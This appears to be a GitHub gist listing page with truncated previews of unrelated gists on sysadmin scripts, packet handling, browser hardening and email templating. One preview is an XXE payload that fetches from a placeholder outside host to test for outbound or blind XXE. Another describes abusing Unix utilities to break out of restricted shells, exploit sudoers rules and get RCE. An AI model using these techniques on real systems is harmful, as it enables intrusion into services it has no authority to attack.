So you want to configure an sftp only user?
groupadd sftponly
@aifsair fser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Some code to retrieve CPUID information in pure Python | |
| # | |
| # Copyright (C) 2009 Nicolas Trangez <eikke eikke com> | |
| # | |
| # This library is free software; you can redistribute it and/or | |
| # modify it under the terms of the GNU Lesser General Public | |
| # License as published by the Free Software Foundation, version 2.1 | |
| # of the License. | |
| # | |
| # This library is distributed in the hope that it will be useful, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add to the bottom of ~/.profile | |
| # Check if this is being called from an interactive shell | |
| case "$-" in | |
| *i*) | |
| # Great, it's an interactive shell. Is this shell being stated by sshd? | |
| if [ `readlink /proc/$PPID/exe` = "/usr/sbin/sshd" ] | |
| then | |
| # exec screen. Attach to or create a new session called auto_ssh. | |
| # -x allows multiple copies of screen to be attached to the same session. | |
| exec screen -xR auto_ssh |
jbenet
/ sftp-user-notes.md
Created
October 25, 2012 15:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2 | |
| """ | |
| Use scapy to modify packets going through your machine. | |
| Based on nfqueue to block packets in the kernel and pass them to scapy for validation | |
| """ | |
| import nfqueue | |
| from scapy.all import * | |
| import os |
lewisd32
/ iptableflip.sh
Created
April 15, 2015 18:20
Snippet of Unbounce script for restarting HAProxy with zero downtime
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Flipping tables! (╯°□°)╯︵ ┻━┻" | |
| num_rules=3 | |
| real=3 # exposed to the ELB as port 443 | |
| test=4 # used to install test certs for domain verification | |
| health=5 # used by the ELB healthcheck | |
| blue_prefix=855 | |
| green_prefix=866 |
atcuno
/ gist:3425484ac5cce5298932
Last active
March 25, 2024 13:55
HowTo: Privacy & Security Conscious Browsing
The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.
I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.
about:config settings to harden the Firefox browser. Privacy and performance enhancements.
To change these settings type 'about:config' in the url bar.
Then search the setting you would like to change and modify the value. Some settings may break certain websites from functioning and
rendering normally. Some settings may also make firefox unstable.
I am not liable for any damages/loss of data.
Not all these changes are necessary and will be dependent upon your usage and hardware. Do some research on settings if you don't understand what they do. These settings are best combined with your standard privacy extensions
(HTTPS Everywhere No longer required: Enable HTTPS-Only Mode, NoScript/Request Policy, uBlock origin, agent spoofing, Privacy Badger etc), and all plugins set to "Ask To Activate".
inability
/ execution-through-execution.md
Last active
November 29, 2018 13:29
Using Unix programs to execute other programs
This Gist documents Unix utilities that have options that can be abused to execute other, arbritrary commands. This information can be useful in many scenarios -- the ones that come to mind are abusing certain /etc/sudoers configurations, breaking out of limited shells (eg. the ones provided in many network devices) and getting RCE in webapps even with restrictive filters in place.
Many of these examples originally came from this blogpost.
This is the script that was used to test these examples:
$ cat test.sh
#!/bin/sh
xals
/ README.txt
Last active
June 28, 2018 12:40
Simple python3 program to send email from a Jinja2 template and a CSV datasource
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This is a simple Python3 program, using a CSV file with headers as datasource. Column names are injected in the template rendering to be used as variable substitution. | |
| This is not perfect. For example, the encoding fails for address headers when there are some accentuated characters (éèà for example) in the firsname or the lastname. | |
| The template can contain UTF-8 characters, the message is Base64 encoded before beeing sent. |
OlderNewer